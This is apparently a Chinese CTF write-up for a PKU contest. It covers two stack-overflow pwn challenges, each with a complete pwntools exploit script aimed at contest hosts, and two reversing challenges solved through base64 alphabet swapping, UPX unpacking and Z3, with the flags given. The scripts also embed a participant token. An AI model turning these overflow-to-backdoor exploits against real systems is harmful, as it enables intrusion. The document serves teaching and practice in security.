pwn-login

登陆功能,随便输入一定长度的字符串fuzz一下,然后会发送core数据,接受保存到本地可执行文件后。

image-20240506164733093

后门函数和栈溢出,直接打就行了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
from pwn import *
from pwn import u64,u32,p64,p32
from ctypes import *
from libcfind import *
from LibcSearcher import *
import base64
import sys
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
debug = 0
if debug:
    p = process('./pwn')
    elf = ELF('./pwn')
    # p = process('', env={'LD_PRELOAD':'./libc.so'})
    # gdb.attach(p)
else:
    p = remote('prob04.contest.pku.edu.cn', 10004)
    # elf = ELF('./pwn')
# -----------------------------------------------------------------------
s = lambda data: p.send(data)
sa = lambda text, data: p.sendafter(text, data)
sl = lambda data: p.sendline(data)
sla = lambda text, data: p.sendlineafter(text, data)
r = lambda num=4096: p.recv(num)
rl = lambda text: p.recvuntil(text)
pr = lambda num=4096: sys.stdout.write(p.recv(num).decode())
inter = lambda: p.interactive()
l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00'))
int16 = lambda data: int(data, 16)
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
# -----------------------------------------------------------------------
rl("Please input your token: ")
sl('557:MEYCIQC2WA6edSSGVo8AOQCj3TXXSSM3owCagj6bHEkuZWg7CAIhAMi6iZUaOsH2KoK-UTxeC00-TSWHvE-3uXF33KxmiGq2')

# rl("Username: ")
# name = 'admin'
# sl(name)
# rl("Password: ")
# password = '1q2w3e4r'
# sl(password)

# rl("Core dumped\n")
# result = p.recvuntil('\x00'*12+'\x5b'+'\x38'+'\x00'*6+'\x1f'+'\x01'+'\x00'*14+'\x01'+'\x00'*15)
# # 打开一个二进制文件,如果文件不存在则会创建该文件
# with open('core', 'wb') as f:
#     # 将result中的数据写入到文件中
#     f.write(result)
backdoor = 0x401276
rl("Username: ")
name = 'admin'
sl(name)
rl("Password: ")
password = b'\x00'*0x98 + p64(backdoor+5)
# gdb.attach(p)
sl(password)


inter()

image-20240506164812435

pwn-easypwn

image-20240506095828812

第二处存在栈溢出,用’\x00’截断溢出到后门函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
from pwn import *
from pwn import u64,u32,p64,p32
from ctypes import *
from libcfind import *
from LibcSearcher import *
import base64
import sys
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
debug = 0
if debug:
    p = process('./pwn')
    elf = ELF('./pwn')
    # p = process('', env={'LD_PRELOAD':'./libc.so'})
    # gdb.attach(p)
else:
    p = remote('prob07.contest.pku.edu.cn', 10007)
    elf = ELF('./pwn')
# -----------------------------------------------------------------------
s = lambda data: p.send(data)
sa = lambda text, data: p.sendafter(text, data)
sl = lambda data: p.sendline(data)
sla = lambda text, data: p.sendlineafter(text, data)
r = lambda num=4096: p.recv(num)
rl = lambda text: p.recvuntil(text)
pr = lambda num=4096: sys.stdout.write(p.recv(num).decode())
inter = lambda: p.interactive()
l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00'))
int16 = lambda data: int(data, 16)
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
# -----------------------------------------------------------------------
rl("Please input your token: ")
sl('557:MEYCIQC2WA6edSSGVo8AOQCj3TXXSSM3owCagj6bHEkuZWg7CAIhAMi6iZUaOsH2KoK-UTxeC00-TSWHvE-3uXF33KxmiGq2')
rl("Enter your username: ")
sl(b'root\x00')
rl("Enter the password: ")
payload = b'!@#$%^&*()_+\x00'
payload = payload.ljust(0x38,b'\x00')
payload += p64(0x401177)
s(payload)

inter()

image-20240506095940700

re-easyre

image-20240506095553980

换表的base64编码。

image-20240506095651479

解码一下就行

flag{B4se64_1s_s0_e4sy}

re-babyre

有UPX壳,用upx.exe -d babyre脱壳

image-20240506195542350

四个part,对应的变换过程,Z3列公式就能直接解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
v5 = 907301700 + 2914111512
print('v5 =',hex(v5))
from z3 import *
def solve_a1():
    a1 = BitVec('a1', 32)
    s = Solver()
    s.add((a1 | 0x8E03BEC3) == (3 * (a1 & 0x71FC413C) - a1 - 1876131848))
    if s.check() == sat:
        m = s.model()
        return m[a1].as_long()
    else:
        return None
v6 = solve_a1()
print('v6 =',hex(v6))
a1 = BitVec('a1', 32)

from z3 import *
s = Solver()
a1 = BitVec('a1', 32)
s.add(a1 <= 0x10000000)
s.add(4 * ((~a1 & 0xA8453437) + 2 * ~(~a1 | 0xA8453437))
      + -3 * (~a1 | 0xA8453437)
      + 3 * ~(a1 | 0xA8453437)
      - (-10 * (a1 & 0xA8453437)
         + (a1 ^ 0xA8453437)) == 551387557)
if s.check() == sat:
    print("v7 =", s.model()[a1])
else:
    print("No solution found")

from z3 import *
a1 = BitVec('a1', 32)
s = Solver()
s.add(a1 <= 0x10000000)
s.add(11 * ~(a1 ^ 0xE33B67BD)
      + 4 * ~(~a1 | 0xE33B67BD)
      - (6 * (a1 & 0xE33B67BD)
         + 12 * ~(a1 | 0xE33B67BD))
      + 3 * (a1 & 0xD2C7FC0C)
      + -5 * a1
      - 2 * ~(a1 | 0xD2C7FC0C)
      + ~(a1 | 0x2D3803F3)
      + 4 * (a1 & 0x2D3803F3)
      - -2 * (a1 | 0x2D3803F3) == -837785892)
if s.check() == sat:
    model = s.model()
    a1_value = model[a1].as_long()
    print("v8 =", hex(a1_value))
else:
    print("No found")

print(hex(78769651))

4ec70d26c0d0e298ae5ebbc2f2b6b48

替换对应part即可

flag{e3c6235c-05d9434d-04b1edf3-04034083}